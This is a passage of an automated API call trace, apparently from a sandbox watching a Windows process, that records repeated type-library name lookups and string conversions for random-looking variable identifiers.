szName="W4xQCX", lHashVal=0x10e28e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.341] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.341] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8051a | out: _Dst=0x67c2d40) returned 0x0 [0069.341] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_W4xQCX") returned 0x105cf8 [0069.341] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Do", cchCount1=-1, lpString2="_B_var_W4xQCX", cchCount2=-1) returned 3 [0069.341] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_W4xQCX" | out: _Dst="_B_var_W4xQCX") returned 0x0 [0069.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_W4xQCX") returned 14 [0069.341] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.341] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_W4xQCX", lHashVal=0x105cf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.341] IUnknown:Release (This=0x665ba50) returned 0xd [0069.341] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.341] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_W4xQCX", lHashVal=0x105cf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.341] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.341] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.341] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_W4xQCX", lHashVal=0x105cf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.341] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.341] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.341] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_W4xQCX", lHashVal=0x105cf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.341] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.341] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.341] IUnknown:Release (This=0x665ba50) returned 0xd [0069.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1250e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_W4xQCX") returned 14 [0069.341] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_W4xQCX", lHashVal=0x105cf8, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0069.341] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8051a | out: _Dst=0x144ec0) returned 0x0 [0069.342] ITypeComp:RemoteBind (in: This=0x665ba60, szName="RAQAAA1", lHashVal=0x10d676, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80596, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RAQAAA1") returned 8 [0069.342] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="RAQAAA1", lHashVal=0x10d676, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80596, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RAQAAA1") returned 8 [0069.342] ITypeComp:RemoteBind (in: This=0x665bd30, szName="RAQAAA1", lHashVal=0x10d676, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.342] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAQAAA1") returned 0x10d676 [0069.342] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="RAQAAA1" | out: _Dst="RAQAAA1") returned 0x0 [0069.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="RAQAAA1") returned 8 [0069.342] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.342] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="RAQAAA1", lHashVal=0x10d676, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.342] IUnknown:Release (This=0x665ba50) returned 0xd [0069.342] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.342] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="RAQAAA1", lHashVal=0x10d676, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.342] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.342] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.342] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="RAQAAA1", lHashVal=0x10d676, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.342] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.342] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.342] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="RAQAAA1", lHashVal=0x10d676, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.342] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80596, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RAQAAA1") returned 8 [0069.342] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="RAQAAA1", lHashVal=0x10d676, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.343] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.343] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80596 | out: _Dst=0x67c2d40) returned 0x0 [0069.343] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RAQAAA1") returned 0x10ca79 [0069.343] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_RAQAAA1" | out: _Dst="_B_var_RAQAAA1") returned 0x0 [0069.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_RAQAAA1") returned 15 [0069.343] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.343] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_RAQAAA1", lHashVal=0x10ca79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.343] IUnknown:Release (This=0x665ba50) returned 0xd [0069.343] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.343] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_RAQAAA1", lHashVal=0x10ca79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.343] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.343] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.343] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_RAQAAA1", lHashVal=0x10ca79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.343] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.343] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.343] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_RAQAAA1", lHashVal=0x10ca79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.343] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.343] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.343] IUnknown:Release (This=0x665ba50) returned 0xd [0069.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1253e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_RAQAAA1") returned 15 [0069.343] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_RAQAAA1", lHashVal=0x10ca79, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.343] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80596 | out: _Dst=0x144ec0) returned 0x0 [0069.343] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jZkBkB", lHashVal=0x1021e1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b805be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jZkBkB") returned 7 [0069.344] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jZkBkB", lHashVal=0x1021e1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b805be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jZkBkB") returned 7 [0069.344] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jZkBkB", lHashVal=0x1021e1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.344] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jZkBkB") returned 0x1021e1 [0069.344] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="jZkBkB" | out: _Dst="jZkBkB") returned 0x0 [0069.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="jZkBkB") returned 7 [0069.344] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.344] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jZkBkB", lHashVal=0x1021e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.344] IUnknown:Release (This=0x665ba50) returned 0xd [0069.344] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.344] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jZkBkB", lHashVal=0x1021e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.344] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.344] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.344] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jZkBkB", lHashVal=0x1021e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.344] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.344] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.344] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jZkBkB", lHashVal=0x1021e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.344] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b805be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jZkBkB") returned 7 [0069.344] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jZkBkB", lHashVal=0x1021e1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.345] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.345] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b805be | out: _Dst=0x67c2d40) returned 0x0 [0069.345] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jZkBkB") returned 0x109c8a [0069.345] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_jZkBkB" | out: _Dst="_B_var_jZkBkB") returned 0x0 [0069.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_jZkBkB") returned 14 [0069.345] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.345] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jZkBkB", lHashVal=0x109c8a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.345] IUnknown:Release (This=0x665ba50) returned 0xd [0069.345] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.345] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jZkBkB", lHashVal=0x109c8a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.345] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.345] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.345] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jZkBkB", lHashVal=0x109c8a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.345] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.345] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.345] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jZkBkB", lHashVal=0x109c8a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.345] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.345] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.345] IUnknown:Release (This=0x665ba50) returned 0xd [0069.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1256e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_jZkBkB") returned 14 [0069.345] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jZkBkB", lHashVal=0x109c8a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0) returned 0x0 [0069.345] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b805be | out: _Dst=0x144ec0) returned 0x0 [0069.345] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KQAD_cc", lHashVal=0x104e6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b805e6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KQAD_cc") returned 8 [0069.346] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KQAD_cc", lHashVal=0x104e6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b805e6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KQAD_cc") returned 8 [0069.346] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KQAD_cc", lHashVal=0x104e6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.346] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KQAD_cc") returned 0x104e6d [0069.346] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="KQAD_cc" | out: _Dst="KQAD_cc") returned 0x0 [0069.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="KQAD_cc") returned 8 [0069.346] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.346] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KQAD_cc", lHashVal=0x104e6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.346] IUnknown:Release (This=0x665ba50) returned 0xd [0069.346] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.346] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KQAD_cc", lHashVal=0x104e6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.346] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.346] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.346] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KQAD_cc", lHashVal=0x104e6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.346] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.346] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.346] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KQAD_cc", lHashVal=0x104e6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.346] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b805e6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KQAD_cc") returned 8 [0069.346] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KQAD_cc", lHashVal=0x104e6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.346] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.347] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b805e6 | out: _Dst=0x67c2d40) returned 0x0 [0069.347] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KQAD_cc") returned 0x1051f1 [0069.347] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_KQAD_cc" | out: _Dst="_B_var_KQAD_cc") returned 0x0 [0069.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_KQAD_cc") returned 15 [0069.347] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.347] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KQAD_cc", lHashVal=0x1051f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.347] IUnknown:Release (This=0x665ba50) returned 0xd [0069.347] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.347] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KQAD_cc", lHashVal=0x1051f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.347] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.347] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.347] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KQAD_cc", lHashVal=0x1051f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.347] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.347] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.347] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KQAD_cc", lHashVal=0x1051f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.347] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.347] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.347] IUnknown:Release (This=0x665ba50) returned 0xd [0069.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1259e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_KQAD_cc") returned 15 [0069.347] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KQAD_cc", lHashVal=0x1051f1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x5f004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x5f004400000000, pDummy=0x0) returned 0x0 [0069.347] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b805e6 | out: _Dst=0x144ec0) returned 0x0 [0069.347] ITypeComp:RemoteBind (in: This=0x665ba60, szName="dACDBZBD", lHashVal=0x10b555, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8060e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="dACDBZBD") returned 9 [0069.348] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="dACDBZBD", lHashVal=0x10b555, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8060e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="dACDBZBD") returned 9 [0069.348] ITypeComp:RemoteBind (in: This=0x665bd30, szName="dACDBZBD", lHashVal=0x10b555, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.348] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dACDBZBD") returned 0x10b555 [0069.348] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="dACDBZBD" | out: _Dst="dACDBZBD") returned 0x0 [0069.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, 